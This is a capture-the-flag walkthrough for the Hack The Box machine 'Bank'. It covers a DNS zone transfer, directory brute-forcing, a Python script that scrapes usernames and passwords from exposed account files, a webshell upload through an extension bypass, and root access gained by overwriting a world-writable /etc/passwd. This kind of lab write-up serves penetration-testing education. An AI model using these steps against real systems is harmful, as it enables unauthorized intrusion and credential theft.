HTB - Bank

Bank

Getting Root

Tools Used:

dig, dirsearch.py, python

Nmap

# Nmap 7.80 scan initiated Thu Mar 19 18:56:57 2020 as: nmap -sC -sV -p 22,53,80 -oA Bank 10.10.10.29   
Nmap scan report for 10.10.10.29
Host is up (0.040s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 19 18:57:12 2020 -- 1 IP address (1 host up) scanned in 15.09 seconds

Enumeration

DNS

Enumerating DNS shows potential vhost to be used in our http enumeration

# Zone Tranfer                                                                                                                                                                                
dig axfr bank.htb @10.10.10.29                                                                                                                                                                
; <<>> DiG 9.11.16-2-Debian <<>> axfr bank.htb @10.10.10.29                                                                                                                                   
;; global options: +cmd                                                                                                                                                                       
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800                                                                                       
bank.htb.               604800  IN      NS      ns.bank.htb.                                                                                                                                  
bank.htb.               604800  IN      A       10.10.10.29                                                                                                                                   
ns.bank.htb.            604800  IN      A       10.10.10.29                                                                                                                                   
www.bank.htb.           604800  IN      CNAME   bank.htb.                                                                                                                                     
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
;; Query time: 54 msec
;; SERVER: 10.10.10.29#53(10.10.10.29)
;; WHEN: Thu Mar 19 19:37:51 EDT 2020
;; XFR size: 6 records (messages 1, bytes 171)

HTTP

# python3 dirsearch.py -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php  

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 220521

Error Log: /opt/dirsearch/logs/errors-20-03-19_20-31-36.log

Target: http://bank.htb

[20:31:36] Starting: 
[20:31:36] 302 -    7KB - /  ->  login.php
[20:31:37] 301 -  305B  - /uploads  ->  http://bank.htb/uploads/
[20:31:38] 301 -  304B  - /assets  ->  http://bank.htb/assets/
[20:31:50] 301 -  301B  - /inc  ->  http://bank.htb/inc/
[20:42:17] 403 -  288B  - /server-status
[20:53:57] 301 -  314B  - /balance-transfer  ->  http://bank.htb/balance-transfer/

Task Completed

Checking out /balance-transfer/

Checking any of the files show login accounts encrypted. See example below:

Custom python script to get all the usernames and password

#!/usr/bin/env python3
# Created By: squid22
# HTB Bank

import requests
import re
import time

url = "http://bank.htb/balance-transfer/"

r = requests.get(url)
data = r.text
#print(data)

f = re.findall(r'href="(\w+\.acc)"', data)

for files in f:
    r = requests.get(url+files)
    stuff = r.text
    user = re.search(r'Email: (.*)', stuff)
    username = user.group(1)
    passwd = re.search(r'Password: (.*)', stuff)
    password = passwd.group(1)

    print(f"File Name: {files}")
    print(f"Username: {username}")
    print(f"Password: {password}")
    print("========================================")

Running the script, shows a file that somehow was not encrypted File Name: 68576f20e9732f1b2edc4df5b8533230.acc

Let's login to http://bank.htb/login.php using the credentials found.

Success!

Getting shell

From the Support link, we can upload files but it seems like we can only upload images. Viewing the source of the page, an interesting debug message states that using *.htb extension executes *.php files.

# mv webshell.php webshell.htb

Privilege Escalation

Method 1 - /etc/passwd

During enumeration, the /etc/passwd showed as world writable

www-data@bank:/var/www/bank/uploads$ stat /etc/passwd
  File: '/etc/passwd'
  Size: 1349            Blocks: 8          IO Block: 4096   regular file
Device: 801h/2049d      Inode: 661044      Links: 1
Access: (0666/-rw-rw-rw-)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2020-03-20 06:03:09.092145868 +0200
Modify: 2020-03-20 06:03:05.884145943 +0200
Change: 2020-03-20 06:03:05.884145943 +0200
 Birth: -

Generate a password using openssl: pass123

# openssl passwd --help
Usage: passwd [options] [passwords]
where options are
-crypt             standard Unix password algorithm (default)
-1                 MD5-based password algorithm
-apr1              MD5-based password algorithm, Apache variant
-salt string       use provided salt
-in file           read passwords from file
-stdin             read passwords from stdin
-noverify          never verify when reading password from terminal
-quiet             no warnings
-table             format output as table
-reverse           switch table columns

# openssl passwd -1 pass123
$1$rptdxUK7$QM4amjM8hyLaeSmEIr.U31

Edit the /etc/passwd file with the generated password.

# vim /etc/passwd
root:$1$rptdxUK7$QM4amjM8hyLaeSmEIr.U31:0:0:root:/root:/bin/bash

Login as root

www-data@bank:/run/shm$ su root
Password: 
root@bank:/run/shm# 
root@bank:/run/shm# id
uid=0(root) gid=0(root) groups=0(root)
root@bank:/run/shm# 
root@bank:/run/shm# 
root@bank:/run/shm# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:50:56:b9:f4:a0  
          inet addr:10.10.10.29  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:feb9:f4a0/64 Scope:Link
          inet6 addr: dead:beef::250:56ff:feb9:f4a0/64 Scope:Global
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1532663 errors:33 dropped:156 overruns:0 frame:0
          TX packets:1522107 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:287906340 (287.9 MB)  TX bytes:713942880 (713.9 MB)
          Interrupt:19 Base address:0x2000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:3393 errors:0 dropped:0 overruns:0 frame:0
          TX packets:3393 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:348982 (348.9 KB)  TX bytes:348982 (348.9 KB)

Method 2 - SUID executable

www-data@bank:/var/www/bank/uploads$ find / -perm -4000 -type f -ls 2>/dev/null
921605  112 -rwsr-xr-x   1 root     root       112204 Jun 14  2017 /var/htb/bin/emergency
397109    8 -rwsr-xr-x   1 root     root         5480 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
655904  484 -rwsr-xr-x   1 root     root       492972 Aug 11  2016 /usr/lib/openssh/ssh-keysign
395220  328 -rwsr-xr--   1 root     messagebus   333952 Dec  7  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper   
921007   12 -rwsr-xr-x   1 root     root         9808 Nov 24  2015 /usr/lib/policykit-1/polkit-agent-helper-1
403773   48 -rwsr-sr-x   1 daemon   daemon      46652 Oct 21  2013 /usr/bin/at
397102   36 -rwsr-xr-x   1 root     root        35916 May 17  2017 /usr/bin/chsh
397137   48 -rwsr-xr-x   1 root     root        45420 May 17  2017 /usr/bin/passwd
397136   44 -rwsr-xr-x   1 root     root        44620 May 17  2017 /usr/bin/chfn
404048   20 -rwsr-xr-x   1 root     root        18168 Nov 24  2015 /usr/bin/pkexec
397130   32 -rwsr-xr-x   1 root     root        30984 May 17  2017 /usr/bin/newgrp
403576   20 -rwsr-xr-x   1 root     root        18136 May  8  2014 /usr/bin/traceroute6.iputils
397103   68 -rwsr-xr-x   1 root     root        66284 May 17  2017 /usr/bin/gpasswd
393513  156 -rwsr-xr-x   1 root     root       156708 May 29  2017 /usr/bin/sudo
403601   72 -rwsr-xr-x   1 root     root        72860 Oct 21  2013 /usr/bin/mtr
397540   20 -rwsr-sr-x   1 libuuid  libuuid     17996 Nov 24  2016 /usr/sbin/uuidd
403655  316 -rwsr-xr--   1 root     dip        323000 Apr 21  2015 /usr/sbin/pppd
393288   40 -rwsr-xr-x   1 root     root        38932 May  8  2014 /bin/ping
393289   44 -rwsr-xr-x   1 root     root        43316 May  8  2014 /bin/ping6
397131   36 -rwsr-xr-x   1 root     root        35300 May 17  2017 /bin/su
403434   32 -rwsr-xr-x   1 root     root        30112 May 15  2015 /bin/fusermount
393504   88 -rwsr-xr-x   1 root     root        88752 Nov 24  2016 /bin/mount
396269   68 -rwsr-xr-x   1 root     root        67704 Nov 24  2016 /bin/umount